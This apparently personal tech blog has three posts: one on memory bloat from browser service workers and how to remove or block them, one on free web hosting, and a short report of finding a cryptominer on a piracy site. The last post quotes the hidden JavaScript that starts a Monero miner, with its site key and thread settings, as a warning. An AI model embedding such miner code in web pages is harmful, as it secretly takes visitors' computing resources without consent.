Sunday, December 29, 2019

Browser Bloat & Service Workers


Contents  

  1. Introduction
  2. Which Browsers use Service Workers?
  3. See Service Workers
  4. Service Worker Functions
  5. Push Notifications
  6. Check Memory Use
  7. Freeing Memory
    1. Subframes
    2. JavaScript
    3. Memory Monitoring
    4. Manage Extensions
    5. Exclude Extensions from Sync
    6. Restart Your Browser Often
  8. Remove or Block Service Workers
  9. Security Considerations
  10. What are the long term solutions?
  11. Footnotes and Reference Links

1. Introduction

We know multiple tabs and extensions in our browsers use additional memory and CPU resources, but did you know most web sites you visit now install JavaScript programs, with out your knowledge or consent, called service workers to do things like place ads on your desktop your ad blocker usually can't stop, and these service workers are each run in their own system process with all the memory and system overhead that entails? These programs can even run after you close the tab or site that installed them, and some restart every time you launch your web browser.

About two weeks ago I launched my Chrome browser, and noticed once again I got a desktop notification ad from a company I ordered something from once. This ad was starting to pop up every time I opened my browser, despite running an ad blocker. I consider desktop notification ads to be particularly annoying, so I opened developer tools, and unregistered the service worker for that site, and a bunch of others from sites I almost never visit, and don't want offline content from. I used Process Hacker to note that Chrome memory usage dropped from about 2.5Gb to 1.1Gb, and with each service worker I deleted, one Chrome process thread went away. While I could have stopped this ad by changing the notification setting for this site, I had no idea the service workers in my browser took so much space!

Some sites like AliExpress had a service worker for each store I'd visited in that site! After restarting the browser, that annoying ad was gone! I repeated this on my Chromebooks and the nasty freezes where the cursor would not move, or barely moved with my track-pad have not happened since.

This started weeks of reading up on service workers, subframes, browser and virtual memory management, leading to some conclusions I think every one who uses a web browser should know.

2. Which Browsers use Service Workers?

All major web browsers (including Chrome 45+, Firefox 44+, Edge 17+, Safari 11.1+) support service workers1. This includes Chromium based browsers such as Blisk, Brave, Epic, Opera, Slimjet, Vivaldi, etc.  Firefox seems to be the only one that allows a user to disable service workers for all sites. The Tor browser 9.02 based on Firefox 68.3.0ESR (Extended Support Release), Basilisk, Pale Moon, and all Firefox ESR releases to date have service workers disabled by default. Service worker memory bloat does not seem to be an issue on mobile operating systems such as Android or IOS as they don't seem to stay in memory when not in use.

3. See Service Workers

There are several ways to see if you have service workers in your browser. In Chrome, and Chromium based browsers, open a new tab and go to the url: chrome://serviceworker-internals/. In Firefox, use about:serviceworkers. In Edge, use the developer tools, which works in all the other browsers as well, for an individual site.

Here is an example chrome://serviceworker-internals tab in Opera:

In Chrome the above works as well as the Developer tools Application tab:


In Microsoft Edge, there was only the Service Workers tab in developer tools:
As of January 15, 2020 Edge based on Chromium provides the same chrome://serviceworker-internals/ URL as other Chrome browsers.

I don't have access to a Mac, so all I can tell you about Safari, is how to enable the developer tools.

4. Service Worker Functions

Service workers can dramatically speed up the loading of a web page, allow the browser to present parts of a page before all the elements have loaded, add offline functionality like offline reading or editing (as with Gmail or Google Docs), conserve bandwidth, and provide notifications (or ads) even when the page is not loaded.  Additional examples are in the footnotes2, including an example service worker with a polite opt-in checkbox3

5. Push Notifications

Push notifications are the one feature of service workers most likely to be abused4. Here are some requests from a blog site5 that asked permission to allow notifications.

What they don't tell you is this also allows them to leave a service worker in your browser for a long time, that can persist after reboots.  If you want to revoke this permission, the easiest way is to use the site settings.  This works in most browsers, just click the icon left of the URL (web address) you are visiting, and select block or Ask by Notifications.  (Navigate to Site settings if you don't see that.)  Please see Allow Website Notifications POP-UP Scam for detailed instructions for popular browsers.

6. Check Memory Use

Most operating systems (like Windows6,7) and browsers (like Chrome8 and Firefox9) provide a task manager to show the resource consumption (CPU, memory, etc.) of system processes.  The browser task managers have the advantage of showing which feature (tab, extension, service worker, or subframe etc.) is associated with a process.  (Chrome used to compare its total to other browsers, but that feature was dropped a long time ago.)

Here is an image of the Chrome task manager running under Windows 10 with an AMD Radeon RX 550 graphics card with 4GB of ram.  Note how much larger the GPU process is than the Browser:
Also note the Gmail service worker highlighted in blue.  This is what allows you to continue reading recent email messages after loading your inbox even if your connection drops.  Note the service worker memory footprint is also larger than other extensions and tabs in this example.

Let's look at another task list when visiting https://www.wunderground.com/.
Notice there are 10 processes labeled Subframe highlighted below the weather tab.  These are all portions of that page that come from other sites.  For several reasons Chrome isolates each portion of the page into a separate process.

7. Freeing Memory

Now how do we get back some of the memory all these things take up in our browser?

7.1 Subframes

Let's start with those subframes we were just looking at. The ad blocker running when that was taken was uBlock Origin with default settings. According to this reddit discussion Privacy Badger does a better job of blocking these. Let's see what happens when we switch to that:
This cut the subframes from 10 to 2, and based on their names, I'd guess at least one provides useful content on the page.  Privacy Badger also has a lower memory footprint than uBlock Origin.

7.2 JavaScript

Here is a memory footprint of Chrome running with the  --process-per-site option:
Note how all the tabs have one memory footprint together, but still account for about 1.4Gb of the browser memory.

Here are about the same tabs loaded after blocking Javascript on just the W3Schools site.
Not many sites are functional without Javascript, however this works fine if you're just looking up some syntax details on W3Schools.  If you like switching between many tabs, you might use site settings or an add-on like NoScript, or JavaScript Switcher to turn off JavaScript when possible to save memory.  (Note Mozilla moved Firefox JavaScript controls from the options menu to about:config in 2013.)

7.3 Memory Monitoring

Besides the task managers, memory monitors are handy to provide early warning when memory is running out.  I compared the five memory monitors in the chrome web store and found the one offered by: pd4d10 about tied for lowest memory footprint with the one offered by: dan.belz69.  I prefer the tooltip detail in the former, and wish the later did a restart rather than a refresh on click.

Unfortunately, I have not seen any sites that provide memory footprints for extensions or add-ons.
I simply watched these five in the Chrome task manager to get a feel for their size variations over time.  A more rigorous approach can be found in this comparison of uBlock and ABP.

7.4 Manage Extensions

On reading the article above, I learned that extensions not only took up space themselves, but many increased the size of every tab loaded in the browser.  I found that I could regain a great deal of memory by simply disabling extensions in Chrome and Firefox that I'm not using until I need them. For example, now I only enable LastPass (who's degraded functionality has me looking at alternatives) when I change a password, or register one on a new site.  This takes a bit longer.  I sure would like to see disable added to the remove and hide menus in the extension icon right-click menu in Chrome.  [Note to self, figure out where best to submit that idea.]

Now when I add and extension, I also consider the cost-benefit in terms of memory footprint.  It is also useful to review browser features, and possibly choose a browser that has features previously only available as extensions built into the browser, like the ad blocking in Brave.

7.5 Exclude Extensions from Sync

After taking inventory of my extensions, I found I had many that I had played with once on one computer that were replicated on many others.  For this reason, I think it is wise to disable sync of extensions in Firefox and Chrome, and manually add them on each system they are used.  This is especially important for Chromebook users.

7.6 Restart Your Browser Often

All browsers seem to take more memory the longer they run.  Closing and restarting the browser can free up wasted memory.  Chrome has a debug url chrome://restart which will restart your browser and keep your current tabs.  This is especially handy on Chromebooks as you can free up memory with out having to log into the Chromebook again!

8. Remove or Block Them

Before removing (unregistering) a service worker, consider that it may be hard to get back. Once unregistered, the browser remembers that decision so it may be hard to change your mind later. Most service workers perform their job quickly, and don't hang around in memory. Therefore, I'd try removing the unwanted persistent ones first by blocking notifications.  Then I would close the browser, wait a minute or two, then re-open it with nothing but a blank tab like about:blank, and then see if any persistent  memory hogs are left.

In Firefox you can block all service workers with the about:config setting  dom.serviceWorkers.enabled.  In Chrome (and related browsers) there is the Block Service Workers extension that will prompt you before allowing a service worker to run.  I suggest limiting the number of sites you allow to use notifications to a few whose notifications are most useful.

9. Security Considerations

In Chrome 67 Site Isolation was added to defend against web attacks like Spectre and Meltdown, adding another 10 to 13% to the memory footprint. This is one reason multi process browsers are safer than single process browsers like Basilisk and Pale Moon, but at a cost of much larger memory use.

Search the web for "MarioNet attack" and you'll find many articles describing undesirable activities service workers could do.  This paper says it isn't a big problem because a "Service Worker can stay alive only for about one minute after the user navigates away from the website".  However, I do not believe this is true if you allow notifications on the site that installs the service worker, and there are many ways a site can nag or trick you into doing so.

10. What are the long term solutions?

Since the early days of the Internet, there has been a constant battle between advertisers, spammers and shoppers for control of their online experience and system resources.  One of the factors that lead to early Google search engine popularity was that ads were simple and fast plain text links instead of images.  Most web developers are paid by the corporations who profit from ads, so are highly motivated to design pages with eye catching video and interactive features that make it almost impossible to block all unwanted content.  Advertisers now detect and block ad blockers, and programmers are responding with anti-blocker blockers.  The EU tried to regulate cookie use, but the laws only resulted in "agree or leave notices" on websites, and more subtle tracking and super cookies.  Merchandisers bribe shoppers with discounts to install their app which can more easily nag you and violate your privacy, and personal assistants spy on conversations so AI can guess what ads to serve next.

What might change in the future?  Will operating systems be re-designed so that the browser will be more closely integrated with virtual memory management?  This seems to already be an advantage of mobile device operating system event driven tasking.  Will web standards integrate some basic functions typically used in JavaScript into CSS or will new funding schemes like Basic Attention Tokens (BAT) help solve the ad battle?  How about bringing back plain text ads linking to ad content with out loading it on the current page?

Will web scraping evolve into meta browsers that scrape what you want off a page, and display a static snapshot until you want to interact with a page again?  Could we see something like dynamic link libraries for browsers to re-use common JavaScript code?  Will stand alone programs that don't require the overhead of the browser make a come back?

Please leave your ideas in the comments!

11. Footnotes and Reference Links

Are Browser Extensions Slowing You Down? - Make Tech Easier

Using the Chrome Task Manager to Find In-Browser Miners

Get an Ad Blocker | Protect Against Websites That Spy - Consumer Reports
  1. Can I use... Service Workers, etc
  2. ServiceWorker Cookbook (with detailed function examples for developers)
  3. Taking the web offline with service workers - mobiForge
  4. Browser push notifications: a feature asking to be abused - Malwarebytes Labs
  5. Example Blog Post that Requests Notifications
  6. Beginner Geek: What Every Windows User Needs to Know About Using the Windows Task Manager
  7. Windows Task Manager: The Complete Guide
  8. How to Use Chrome’s Built-In Task Manager
  9. Task Manager: see what tabs or extensions are slowing down Firefox


  10. Task Manager - see what tabs or extensions are slowing down Firefox | Firefox Help
  11. Service Worker Security FAQ: Why doesn’t Chrome prompt the user before registering a Service Worker?
  12. Debug Background Services With Chrome DevTools
  13. Turn notifications on or off - Computer - Google Chrome Help
  14. Does service worker runs on background even if browser is closed? - Stack Overflow

  15. Last update: 1/16/2020

Saturday, March 9, 2019

Free Web Hosting Services

Have you ever created a little website for an event or group at a bargain introductory price, and then forgotten about it until you notice huge recurring charges applied to your credit card?  I have, so now I stay away from introductory pricing on web sites.  A few years back there seemed to be dozens of places to host a web site for free, but now there are few choices for general purpose sites with rich site building features that don't have some kind of catch or gotcha to get you to upgrade to a premium plan.

I've looked at a number of pages like this one that lists free hosting services, but they never seem to reveal the catch or gotcha I'd care about for each provider.
So after trying a few services, and finding the gotchas, I thought I'd start a spreadsheet to track this.  Please add information about your favorite free or really cheap hosting sites in the comments, or let me know of any similar comparison charts already out there!  Should there be other features important enough to include in the summary like cron jobs, or number of ftp accounts?

You can share this sheet, or view all sheets, with this link: http://bit.ly/freewebh

This is one of the topics I covered in a WordPress talk for CUCUG, and will expand on for RCSI in May.  Please share your thoughts in the comments.

Please share this post with the shortlink: http://bit.ly/CompareFreeHosting

P.S.  I also have a sheet for comparing cheap mobile plans.

Since posting this, many new options have become available besides traditional hosting accounts.  See:

Wednesday, February 13, 2019

TPB mining again

I was helping someone today who was visiting thepiratebay.org, and looking at the source code of the page to troubleshoot an ad-blocker when I ran across this:

<script>
  var miner=new CRLT.Anonymous('37efd635d0ec154de4d0b17dd1952aa3b5e88acd6bbe', {
    threads:4,throttle:0.5, coin: "xmr",
  });
  miner.start();
</script>

Now there's a good reason to block JavaScript on this site!!!